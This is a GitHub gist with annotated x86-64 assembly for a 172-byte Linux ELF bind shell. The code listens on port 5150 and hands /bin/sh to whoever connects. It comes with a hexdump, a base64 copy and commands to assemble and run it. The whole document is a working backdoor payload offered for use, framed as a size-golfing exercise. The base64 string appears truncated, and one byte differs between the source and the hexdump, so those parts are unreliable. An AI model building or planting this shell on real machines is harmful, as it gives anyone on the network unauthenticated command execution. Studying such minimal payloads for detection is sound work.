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Last active December 17, 2020 20:19
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  • Save netspooky/c6db0034d2728a6906fe27248061d4ac to your computer and use it in GitHub Desktop.
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A 64 bit bind shell ELF binary in 172 bytes.
org 0x100000000
db 0x7F, "ELF" ; 0x0 | 7f454c46 | Elf Magic Value |
_start: ; | |-- Begin socket syscall |
;-- int socket(int domain, int type, int protocol); ------------------------//-+
; rdi = sockfd |
; rsi = sockaddr |
; rdx = addrlen |
;---------------------------------------------- returns socket fd if success --+
push byte 0x29 ; 0x04 | 6a29 | Syscall 41 - socket |
pop rax ; 0x06 | 58 | Putting it into RAX |
push byte 0x2 ; 0x07 | 6a02 | AF_INET |
pop rdi ; 0x09 | 5f | Into RDI |
push byte 0x1 ; 0x0A | 6a01 | SOCK_STREAM |
pop rsi ; 0x0C | 5e | Into RSI |
cdq ; 0x0D | 99 | RDX = 0 sign extend RAX into RDX. |
jmp short conec ; 0x0E | eb 3c | Then onto the rest of our code |
dw 2 ; 0x10 | 02 00 | e_type |
dw 0x3e ; 0x12 | 3e 00 | e_machine |
dd 1 ; 0x14 | 01 00 00 00 | e_version |
dd _start - $$ ; 0x18 | 04 00 00 00 | e_entry |
phdr: ; | |-- Begin Program Header |
dd 1 ; 0x1C | 01 00 00 00 | [PHDR] p_type |
dd phdr - $$ ; 0x20 | 1C 00 00 00 | [EHDR] e_phoff [PHDR] p_flags |
dd 0 ; 0x24 | 00 00 00 00 | [PHDR] p_offset |
dd 0 ; 0x28 | 00 00 00 00 | [EHDR] e_shoff |
dq $$ ; 0x2C | 00 00 00 00 | [PHDR] p_vaddr |
; 0x30 | 01 00 00 00 | [EHDR] e_flags |
dw 0x40 ; 0x34 | 40 00 | [EHDR] e_ehsize [PHDR] p_addr |
dw 0x38 ; 0x36 | 38 00 | [EHDR] e_phentsize |
dw 1 ; 0x38 | 01 00 | [EHDR] e_phnum |
dw 2 ; 0x3A | 02 00 | [EHDR] e_shentsize |
execy: ; | |-- Begin execve syscall |
add al, 0x3b ; 0x3C | 043b | execve syscall |
syscall ; 0x3E | 0f05 | Call kernel |
dd 0 ; 0x40 | | [PHDR] p_filesz |
add al, 0x3b ; 0x44 | 043b | execve syscall |
syscall ; 0x46 | 0f05 | Call kernel |
dd 0 ; 0x48 | 00 00 00 00 | [PHDR] p_memsz |
conec: ; | |-- Begin connect syscall |
syscall ; 0x4C | 0f05 | Execute syscall we set up before. |
;-- bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen); ------//-+
; rdi = sockfd |
; rsi = sockaddr |
; rdx = addrlen |
;------------------------------------------------------ returns 0 if success --+
mov rdi,rax ; 4989c0 ; Save fd in rdi, is preserved |
xor rbx,rbx ; 4831db ; get a 0 in rbx |
push rbx ; 55 ; push twice |
push rbx ; 55 ; |
mov BYTE [rsp],0x2 ; c6042402 ; AF_INET |
mov WORD [rsp+0x2],0x1e14 ; 66c7442402141e ; Put port 5150 on stack |
mov rsi,rsp ; 4889e6 ; sockaddr |
push 0x10 ; 6a10 ; addrlen |
pop rdx ; 5a ; addrlen is 16 |
push 0x31 ; 6a31 ; syscall 49 - bind |
pop rax ; 58 |
syscall ; 0f05 |
;-- listen(int sockfd, int backlog); ---------------------------------------//-+
; rdi = sockfd |
; rsi = backlog - maximum connection queue |
;------------------------------------------------------ returns 0 if success --+
push 0x1 ; 6a01 ; We just want one connection in the queue |
pop rsi ; 5e |
push 0x32 ; 6a32 ; syscall 50 - listen |
pop rax ; 58 |
syscall ; 0f05 |
;-- accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); ---------//-+
; rdi = sockfd |
; rsi = sockaddr |
; rdx = addrlen |
;----------------------------------------------- returns socketfd if success --+
mov rsi,rsp ; 4889e6 |
xor rcx,rcx ; 4831c9 |
mov cl,0x10 ; b110 |
push rcx ; 51 |
mov rdx,rsp ; 4889e2 |
push 0x2b ; 6a2b ; syscall 43 - accept |
pop rax ; 58 |
syscall ; 0f05 |
;-- Handling the fd here and preparing for dup2 loop -----------------------//-+
pop rcx ; 59 |
mov rdi, rax ; 4889c7 ; put fd in rdi |
push 0x3 ; 6a03 |
pop rsi ; 5e |
;-- dup2(int oldfd, int newfd); --------------------------------------------//-+
; rdi = oldfd |
; rsi = newfd |
;----------------- Copies file descriptors stdin (0), stdout (1), stderr (2) --+
dup2: ; |
dec rsi ; 48ffce |
push 0x21 ; 6a21 |
pop rax ; 58 |
syscall ; 0f05 |
jne dup2 ; 75f6 |
;-- execve(const char *pathname, char *const argv[],char *const envp[]); ---//-+
; rdi = pointer to /bin/sh |
; rsi = argv - 0 |
; rdx = envp - 0 |
;----------------------------------------- on success, execve doesn't return --+
cdq ; 99 ; zero out rdx |
mov esi,edx ; 4831f6 |
mov rdi,0x68732f6e69622f2f ; 48bf2f2f62696e2f7368 |
shr rdi,0x8 ; 48c1ef08 |
push rdi ; 57 |
push rsp ; 54 |
pop rdi ; 5f ; point rdi to /bin/sh string |
jmp short execy ; eb8e ; ret2programheaders |
;-- hexdump ----------------------------------------------------------------//-+
; |
; 00000000: 7f45 4c46 6a29 586a 025f 6a01 5e99 eb3c .ELFj)Xj._j.^..< |
; 00000010: 0200 3e00 0100 0000 0400 0000 0100 0000 ..>............. |
; 00000020: 1c00 0000 0000 0000 0000 0000 0000 0000 ................ |
; 00000030: 0100 0000 4000 3800 0100 0200 043b 0f05 ....@.8......;.. |
; 00000040: 0000 0000 043b 0f05 0000 0000 0f05 4889 .....;........H. |
; 00000050: c748 31db 5353 c604 2402 66c7 4424 0214 .H1.SS..$.f.D$.. |
; 00000060: 1e48 89e6 6a10 5a6a 3158 0f05 6a01 5e6a .H..j.Zj1X..j.^j |
; 00000070: 3258 0f05 4889 e648 31c9 b110 5148 89e2 2X..H..H1...QH.. |
; 00000080: 6a2b 580f 0559 4889 c76a 035e 48ff ce6a j+X..YH..j.^H..j |
; 00000090: 2158 0f05 75f6 9989 d648 bf2f 2f62 696e !X..u....H.//bin |
; 000000a0: 2f73 6848 c1ef 0857 545f eb90 /shH...WT_.. |
; |
; base64 encoded version, just use the standard tricks to get this into a file |
; |
; DwVIieZIMcmxEFFIieJqK1gPBVlIicdqA15I/85qIVgPBXX2mYnWSL8vL2Jpbi9zaEjB7whXVF/r |
; kA== |
; |
; Otherwise compile like this: |
; |
; nasm -f bin ubind.asm -o ubind |
; chmod +x ubind |
; ./ubind |
; |
;---------------------------------------------------------------- @netspooky --+
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